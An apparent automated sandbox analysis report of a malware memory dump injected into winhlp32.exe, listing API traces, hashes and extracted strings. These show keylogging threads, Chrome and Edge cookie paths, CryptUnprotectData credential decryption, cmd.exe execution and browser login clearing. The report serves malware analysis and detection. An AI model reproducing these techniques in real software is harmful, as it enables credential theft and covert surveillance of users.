                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: _free$FileModuleName
                                    • String ID: C:\Windows\winhlp32.exe
                                    • API String ID: 2506810119-3669941681
                                    • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                    • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                    • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                    • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                    • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                    • String ID: /sort "Visit Time" /stext "$0NG
                                    • API String ID: 368326130-3219657780
                                    • Opcode ID: 1c9c4ba399293831d0fb5f486923e09a60e5b94a628d9fb6433429bc7bd7f276
                                    • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                    • Opcode Fuzzy Hash: 1c9c4ba399293831d0fb5f486923e09a60e5b94a628d9fb6433429bc7bd7f276
                                    • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _wcslen.LIBCMT ref: 004162F5
                                      • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                      • Part of subcall function 00413877: RegSetValueExA.KERNELBASE(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                      • Part of subcall function 00413877: RegCloseKey.KERNELBASE(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                      • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _wcslen$CloseCreateValue
                                    • String ID: !D@$okmode$PG
                                    • API String ID: 3411444782-3370592832
                                    • Opcode ID: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
                                    • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                    • Opcode Fuzzy Hash: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
                                    • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                    Strings
                                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                    • User Data\Default\Network\Cookies, xrefs: 0040C603
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                    • API String ID: 1174141254-1980882731
                                    • Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                    • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                    • Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                    • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                    Strings
                                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                    • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                    • API String ID: 1174141254-1980882731
                                    • Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                    • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                    • Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                    • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                                    • CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040A20E
                                    • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040A21A
                                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread$LocalTimewsprintf
                                    • String ID: Offline Keylogger Started
                                    • API String ID: 465354869-4114347211
                                    • Opcode ID: 052d9f24e9ed53101c9c6e29893d10a0ebf43ddb848004275c2ad0d2f900b3d6
                                    • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                    • Opcode Fuzzy Hash: 052d9f24e9ed53101c9c6e29893d10a0ebf43ddb848004275c2ad0d2f900b3d6
                                    • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                                    • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread$LocalTime$wsprintf
                                    • String ID: Online Keylogger Started
                                    • API String ID: 112202259-1258561607
                                    • Opcode ID: 1301e6b876f99197b04564c733fafc78f062806f1783c7b989fb50bec4e70a22
                                    • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                    • Opcode Fuzzy Hash: 1301e6b876f99197b04564c733fafc78f062806f1783c7b989fb50bec4e70a22
                                    • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                    • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: CryptUnprotectData$crypt32
                                    • API String ID: 2574300362-2380590389
                                    • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                    • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                    • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                    • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                    • CloseHandle.KERNEL32(?), ref: 004051CA
                                    • SetEvent.KERNEL32(?), ref: 004051D9
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandleObjectSingleWait
                                    • String ID: Connection Timeout
                                    • API String ID: 2055531096-499159329
                                    • Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                    • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                    • Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                    • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Exception@8Throw
                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                    • API String ID: 2005118841-1866435925
                                    • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                    • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                    • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                    • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
                                    • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F823,pth_unenc,004752D8), ref: 0041384D
                                    • RegCloseKey.ADVAPI32(004752D8,?,0040F823,pth_unenc,004752D8), ref: 00413858
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID: pth_unenc
                                    • API String ID: 1818849710-4028850238
                                    • Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                    • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                    • Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                    • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                      • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                      • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                    • String ID: bad locale name
                                    • API String ID: 3628047217-1405518554
                                    • Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                    • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                    • Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                    • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                    • ShowWindow.USER32(00000009), ref: 00416C61
                                    • SetForegroundWindow.USER32 ref: 00416C6D
                                      • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                      • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                      • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                    • String ID: !D@
                                    • API String ID: 3446828153-604454484
                                    • Opcode ID: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
                                    • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                    • Opcode Fuzzy Hash: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
                                    • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell
                                    • String ID: /C $cmd.exe$open
                                    • API String ID: 587946157-3896048727
                                    • Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                    • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                    • Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                    • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                    • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                    • TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: TerminateThread$HookUnhookWindows
                                    • String ID: pth_unenc
                                    • API String ID: 3123878439-4028850238
                                    • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                    • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
                                    • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                    • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: GetCursorInfo$User32.dll
                                    • API String ID: 1646373207-2714051624
                                    • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                    • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                                    • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                    • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                    • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetLastInputInfo$User32.dll
                                    • API String ID: 2574300362-1519888992
                                    • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                    • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                                    • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                    • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __alldvrm$_strrchr
                                    • String ID:
                                    • API String ID: 1036877536-0
                                    • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                    • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                    • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                    • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                    • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                    • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                    • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                    • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep
                                    • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                    • API String ID: 3472027048-1236744412
                                    • Opcode ID: f1247b9b7b7232e3c2b0df6ea8e4249d3c093c33305ff24fa1c69204234e4c98
                                    • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                    • Opcode Fuzzy Hash: f1247b9b7b7232e3c2b0df6ea8e4249d3c093c33305ff24fa1c69204234e4c98
                                    • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                      • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                      • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                                    • Sleep.KERNEL32(000001F4), ref: 0040A573
                                    • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Window$SleepText$ForegroundLength
                                    • String ID: [ $ ]
                                    • API String ID: 3309952895-93608704
                                    • Opcode ID: e4ff9062ebc1855ffc8709a41a4aeb88848ac43e96cbaf8abbe5df7ed01e55c0
                                    • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                    • Opcode Fuzzy Hash: e4ff9062ebc1855ffc8709a41a4aeb88848ac43e96cbaf8abbe5df7ed01e55c0
                                    • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • Opcode ID: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                                    • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                    • Opcode Fuzzy Hash: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                                    • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • Opcode ID: 253450334f16ac4bada5e464aed069c53fdbe8794578123440a1a1ba72333804
                                    • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                    • Opcode Fuzzy Hash: 253450334f16ac4bada5e464aed069c53fdbe8794578123440a1a1ba72333804
                                    • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                    • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: LibraryLoad$ErrorLast
                                    • API String ID: 3177248105-0
                                    • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                    • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                    • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                    • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C4D7
                                    • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
